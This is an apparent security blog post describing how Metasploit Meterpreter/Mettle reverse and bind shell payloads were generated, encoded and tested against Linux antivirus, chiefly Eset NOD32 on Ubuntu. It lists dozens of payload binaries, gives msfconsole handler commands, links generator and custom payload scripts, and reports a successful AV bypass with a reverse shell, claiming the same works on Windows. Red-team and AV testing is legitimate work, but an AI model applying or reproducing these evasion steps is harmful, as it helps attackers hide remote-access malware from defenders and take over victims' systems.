Metasploit payloads evasion against Linux AV

Well, there are not many Linux antivirus solutions out there, but of the few I think Avast, Eset and Kaspersky are among the best. The purpose of this article is not to promote one product over another, but rather to use them in a live test that could be part of a Red-Team exercise (if they ever go down this path, of course): to prepare against whatever antivirus software may be present and to know what will get flagged and what will pass (Metasploit/Meterpreter/Mettle).

So for the sake of this exercise I have created a simple shell script generator that produces various encoded Linux executable payloads of interest. We upload them to a Linux virtual machine (Ubuntu 18.04 x86_64) and let the installed AV handle the findings. What is left are the pieces that would theoretically work and bypass the AV, so we then test a few of them to verify their functionality.

I have concentrated mainly on the Linux x86 and x86_64 Meterpreter/Mettle payloads with various encoder combinations. The shell script generator includes variable names that can be changed to use whatever combination one likes, automating the process of generating the binaries.

Make sure you place the script below in your metasploit-framework path and make it executable. The generator script resides here:

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/AV-TEST-LINUX.sh

When running the script you should input the Metasploit-framework LISTENING IP address and TCP port, for example:

In our first test scenario we will be using Eset NOD32 4.0.90 on Ubuntu 18.04 (x86_64).

Next we have the list of generated test payloads that we will feed via scp to the remote machine running the Linux AV. In our test we have generated 47 executables.

-rw-r--r-- 1 root root 1102368 Apr 23 23:44 aarch64-reverse_tcp2.elf
-rw-r--r-- 1 root root     332 Apr 23 23:43 aarch64-reverse_tcp.elf
-rw-r--r-- 1 root root 1030664 Apr 23 23:44 armle-reverse_tcp2.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsbe-reverse_tcp.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsle-reverse_tcp.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec-xor.elf
-rw-r--r-- 1 root root     198 Apr 23 23:39 x64-mt-bind_tcp.elf
-rw-r--r-- 1 root root     239 Apr 23 23:39 x64-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     249 Apr 23 23:38 x64-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:38 x64-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-rev-http.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:40 x64-mt-rev-https.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     206 Apr 23 23:40 x64-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     198 Apr 23 23:40 x64-sh-bind_tcp.elf
-rw-r--r-- 1 root root     247 Apr 23 23:40 x64-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     249 Apr 23 23:40 x64-sh-reverse.elf
-rw-r--r-- 1 root root     194 Apr 23 23:40 x64-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:40 x64-sh-reverse-xor.elf
-rw-r--r-- 1 root root     122 Apr 23 23:41 x86-exec.elf
-rw-r--r-- 1 root root     257 Apr 23 23:41 x86-exec-xor.elf
-rw-r--r-- 1 root root     194 Apr 23 23:42 x86-mt-bind_tcp.elf
-rw-r--r-- 1 root root     329 Apr 23 23:41 x86-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:41 x86-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     207 Apr 23 23:41 x86-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:41 x86-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:41 x86-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root     614 Apr 23 23:43 x86-mt-reverse_tcp-xor.elf.multi
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-http.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-https.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     162 Apr 23 23:43 x86-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     194 Apr 23 23:43 x86-sh-bind_tcp.elf
-rw-r--r-- 1 root root     297 Apr 23 23:43 x86-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     329 Apr 23 23:42 x86-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     207 Apr 23 23:43 x86-sh-reverse.elf
-rw-r--r-- 1 root root     152 Apr 23 23:43 x86-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     287 Apr 23 23:43 x86-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:43 x86-sh-reverse-xor.elf

Once we have uploaded them the AV kicks in and, of course, auto-removes most of them.

Once the process finishes we see that a few files are left intact; out of these some won't work, but some will, which we will test next. We have 27 files left.

Out of these, let's look at the x86_64 ones, which are of interest to us since the VM runs 64-bit:

-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec-xor.elf
-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-mt-bind_tcp.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-sh-bind_tcp.elf
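Comparing the listing before upload with the one after the scan by hand gets tedious across 47 samples and several AV products, so here is an added example (not part of the original post or the linked scripts) that parses the two ls -l listings and reports what the scanner removed, grouped by architecture, payload family and encoder. The sample lines are a subset of the listings above; the filename convention (arch-family-payload[-xor]) is assumed from them.

```python
"""Compare the pre-upload and post-scan listings of an AV coverage test and report
what the scanner removed, grouped by arch, payload family and encoder (added example)."""
import re
from collections import defaultdict
# ls -l layout: perms links owner group size month day time name
LS_LINE = re.compile(r"^\S+\s+\d+\s+\S+\s+\S+\s+(\d+)\s+\S+\s+\d+\s+\S+\s+(\S+)$")
FAMILIES = {"mt": "meterpreter", "sh": "shell"}  # generator naming, assumed from the listing

def parse_listing(text):
    out = {}  # filename -> size; lines that are not ls -l entries are skipped
    for line in text.splitlines():
        m = LS_LINE.match(line.strip())
        if m:
            out[m.group(2)] = int(m.group(1))
    return out

def classify(name):
    """'x64-mt-reverse_tcp-xor2.elf' -> ('x64', 'meterpreter', 'xor')."""
    parts = name.split(".elf")[0].split("-")
    enc = "xor" if any(p.startswith("xor") for p in parts[2:]) else "plain"
    return parts[0], FAMILIES.get(parts[1], parts[1]), enc

def coverage_report(before_text, after_text):
    """Per-(arch, family, encoder) [removed, total] counts plus the overall removal rate."""
    before, after = parse_listing(before_text), parse_listing(after_text)
    groups = defaultdict(lambda: [0, 0])
    for name in before:
        g = groups[classify(name)]
        g[1] += 1
        if name not in after:
            g[0] += 1
    removed = sorted(set(before) - set(after))
    return {"removed": removed, "survived": sorted(set(before) & set(after)),
            "rate": len(removed) / len(before), "groups": dict(groups)}
# Sample input: a subset of the two listings in the article (before upload / after the scan).
BEFORE = """\
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec-xor.elf
-rw-r--r-- 1 root root     198 Apr 23 23:39 x64-mt-bind_tcp.elf
-rw-r--r-- 1 root root     239 Apr 23 23:39 x64-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     249 Apr 23 23:38 x64-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     249 Apr 23 23:40 x64-sh-reverse.elf
"""
AFTER = """\
-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec-xor.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-mt-bind_tcp.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-reverse_tcp-xor2.elf
"""
```

Run coverage_report(BEFORE, AFTER) on the real listings (ls -l on the sender and on the VM after the scan) to get a per-family removal rate that can be compared across AV products.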

We will configure our test LISTENER (place the script below in the metasploit-framework directory and make it executable):

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LISTENER-LINUX-METTLE.sh

(And adjust it to the remote payloads under test, i.e. change line 13 accordingly.)

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh

We need to change linux/x64/meterpreter/reverse_tcp in the LISTENER to the corresponding payload if we are going to verify anything other than meterpreter/reverse_tcp,

which in this case becomes

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST ' > run.listener.sh

The above will work with x64-mt-reverse_tcp-xor2.elf since the platform is x64 and it is a meterpreter reverse TCP payload, so we will fire up our listener (please note the difference between the two payload names above: meterpreter/reverse_tcp is the staged payload, meterpreter_reverse_tcp the stageless one!)

And execute the payload on the testing VM with Eset NOD32 AV... and get a nice core-dumped message :)

So let's try the other x86_64 meterpreter/mettle ones; next up is x64-mt-bind_tcp.elf.

So we adjust the LISTENER again, this time with the linux/x64/meterpreter/bind_tcp payload. This time, however, we need to add the remote IP for bind_tcp to work (which kinda sucks), but we will test it nevertheless, and this time it works.

But we want a working reverse meterpreter/mettle payload that bypasses Eset NOD32!

So let's try some more custom code:

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LINUX-FORK-METTLE.sh

And upload the linux-payload to the VM with NOD32 and run the listener.

Execute the linux-payload and ... success, we have bypassed the AV with a custom reverse mettle payload :)

Did I mention that you can do the same for Windows PE32? No? :) Well, now you know; it works just the same on Windows, and can be fully automated for AV evasion testing via the above scripts, scp, etc.


3 Responses to Metasploit payloads evasion against Linux AV

  1. Pingback: Metasploit payloads evasion against Linux AV – Astr0baby’s not so random thoughts _____ rand() % 100; – The Library 6.0

  2. Pingback: AV evasion of Metasploit payloads on the Linux platform – NEWS.ALL

  3. Pingback: AV evasion of Metasploit payloads on the Linux platform - IcySun'Blog
